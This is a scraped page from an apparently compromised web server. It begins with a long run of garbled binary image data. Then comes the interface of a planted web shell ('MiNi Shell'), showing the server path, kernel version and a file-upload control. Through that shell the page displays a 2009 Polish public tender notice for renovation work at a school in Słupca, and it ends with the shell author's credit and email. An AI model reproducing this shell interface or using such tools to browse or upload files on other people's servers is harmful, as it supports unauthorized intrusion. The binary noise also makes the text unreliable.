JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090605/180524-N-2009.html

<p class="kh_header"><b>Słupca: Roboty remontowo-budowlane dotyczące pomieszczeń pracowni hotelarsko-gastronomicznej wraz z zapleczem gastronomicznym w budynku Zespołu Szkół Ekonomicznych w Słupcy.</b><br>
<b>Numer ogłoszenia: 180524 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Słupecki , ul. Poznańska 20, 62-400 Słupca, woj. wielkopolskie, tel. 063 2758600, 2758624, faks 063 2758669.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slupca.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowo-budowlane dotyczące pomieszczeń pracowni hotelarsko-gastronomicznej wraz z zapleczem gastronomicznym w budynku Zespołu Szkół Ekonomicznych w Słupcy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: roboty remontowo-budowlane dotyczące pomieszczeń pracowni hotelarsko-gastronomicznej wraz z zapleczem gastronomicznym w budynku Zespołu Szkół Ekonomicznych w Słupcy.
2. Przedmiotem zamówienia są prace remontowo-budowlane w pomieszczeniach pracowni hotelarsko gastronomicznej wraz z zapleczem gastronomicznym, zgodnie z przedmiarem robót i szczegółową specyfikacją techniczną wykonania i odbioru robót budowlanych stanowiącymi integralną część Specyfikacji Istotnych Warunków Zamówienia.( załączniki nr 8 i 9) 
3. Szczegółowy zakres rzeczowy robót określają:
 1) dokumentacja projektowa - do wglądu w Zespole Szkół Ekonomicznych w Słupcy, ulica Powstańców Wielkopolskich 22, sekretariat. 
 2)  przedmiar robót - stanowiący załącznik nr 8 do SIWZ,
 3) szczegółowa specyfikacja techniczne wykonania i odbioru robót budowlanych - stanowiące załącznik nr 9  do SIWZ,
4) rysunki przedstawiające wyposażenie kuchni stanowiące załącznik nr 10 do SIWZ
5) przedmiot zamówienia obejmuje również wszystkie prace i obowiązki wykonawcy wymienione we wzorze umowy - załącznik nr 4 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1)     posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia tzn. prowadzoną działalność gospodarczą w ww. zakresie, zarejestrowaną w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej,
2)     nie podlegać wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 
ust. 1 pkt. 1-9 oraz art. 24 ust. 2 pkt. 1-4 ustawy Prawo zamówień publicznych,
3)  znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) wskazać do uczestnictwa w wykonaniu niniejszego zamówienia kierownika robót posiadającego uprawnienia do kierowania i nadzorowania robotami w zakresie niezbędnym przy realizacji  robót będących przedmiotem zamówienia  wraz z aktualnymi zaświadczeniami 
o przynależności do Izby Inżynierów Budownictwa oraz wskazać kluczowych pracowników przewidzianych do realizacji zamówienia,  
5) wykazać się doświadczeniem zawodowym; tzn. wykonaniem w okresie ostatnich pięciu lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia, 
6)  wykazać się możliwością korzystania z niezbędnego sprzętu w momencie realizacji zamówienia potrzebnego do wykonania przedmiotowych robót budowlanych zgodnego ze szczegółowymi specyfikacjami technicznymi wykonania i odbioru robót budowlanych,
7) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności         gospodarczej na sumę ubezpieczenia nie mniejszą niż 100 000 PLN, 
8)  jeśli wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to:
a)	 warunek określony w pkt. 1) i 2) musi spełniać każdy z Wykonawców,
b)	 warunek określony w pkt. 3-7) muszą spełniać łącznie wszyscy Wykonawcy. 
2. Ocena spełniania ww. warunków określonych dla wykonawców będzie dokonywana zgodnie 
z formułą spełnia nie spełnia, w oparciu o informacje zawarte w dokumentach 
i oświadczeniach wyszczególnionych w § 7 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wszystkie dokumenty w ofercie wykonawca musi przedstawić w formie oryginałów albo kopii   
    poświadczonych za zgodność z oryginałem przez wykonawcę.
2. Oferta powinna zawierać następujące dokumenty:
	1) formularz oferty - załącznik nr 1, 
	2) oświadczenie wykonawcy o spełnianiu warunków określonych w  art. 22 ustawy i o nie podleganiu wykluczeniu zgodnie z art.24 ust.1 i 2 ustawy - załączniki nr   2 i 3, 
  3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji            	   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub       	   zgłoszenia do ewidencji działalności gospodarczej - potwierdzające, że profil działalności  
      wykonawcy odpowiada przedmiotowi zamówienia, wystawione nie wcześniej niż 6  
      miesięcy przed upływem terminu składania ofert, 
           4)  wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z 
                danymi na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych  
                do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności według 
                wzoru stanowiącego  załącznik nr 5 do SIWZ
	  Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje minimum 
              jedną osoba  posiadającą uprawnienia do kierowania robotami budowlanymi w branży  
              konstrukcyjno-budowlanej, jedną osobą do kierowania robotami budowlanymi w branży 
              sanitarnej oraz jedna osobą do kierowania robotami budowlanymi w branży elektrycznej;
5)  dokumenty stwierdzające, że osoby, o których mowa w pdpkt 4) posiadają wymagane 
      uprawnienia, tj. kopie uprawnień budowlanych oraz aktualne zaświadczenia o 
       przynależności tych osób do właściwej izby samorządu zawodowego;
6) wykaz wykonanych robót budowlanych  w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeśli okres prowadzenia    działalności jest krótszy - w tym okresie - odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, według wzoru stanowiącego załącznik nr 7 do niniejszej SIWZ oraz dokumenty ( np. referencje, protokoły odbioru końcowego) potwierdzające, że roboty te zostały wykonane należycie. Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 5 lat wykonał minimum 2 prace zbliżone zakresem do robót objętych przedmiotem zamówienia. Przez pracę zbliżoną swym rodzajem i wartością przedmiotowi zamówienia należy rozumieć robotę remontowo-budowlaną  o wartości nie mniejszej niż 100 000 zł brutto każda.
7) pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio 
 z załączonych dokumentów. Pełnomocnictwo musi być dołączone do oferty w formie                oryginału albo kopii poświadczonej przez notariusza za zgodność z oryginałem,
	 8) parafowany wzór umowy - załącznik nr 4,
       9)  oświadczenie , że wykonawca nie zalega z opłacaniem  podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych  płatności  lub wstrzymanie w całości wykonania decyzji właściwego organu .
     10) wykaz sprzętu potrzebnego do wykonania przedmiotowych robót budowlanych zgodnego ze szczegółowymi specyfikacjami technicznymi wykonania i odbioru robót budowlanych - załącznik nr 6,            
11)  kosztorys ofertowy (sporządzony wg dołączonego przedmiaru robót),
12) pełnomocnictwo zgodnie z art. 23 ustawy, jeżeli wykonawcy ubiegają się wspólnie 
  o udzielenie zamówienia (tylko, jeśli dotyczy),
12)  polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 100 000 PLN..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.powiat-slupca.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Słupcy,62-400 Słupca,  ulica Poznańska 20, wejście Oficyna B pokój 13-14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Słupcy,62-400 Słupca,  ulica Poznańska 20, budynek główny, pokój Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com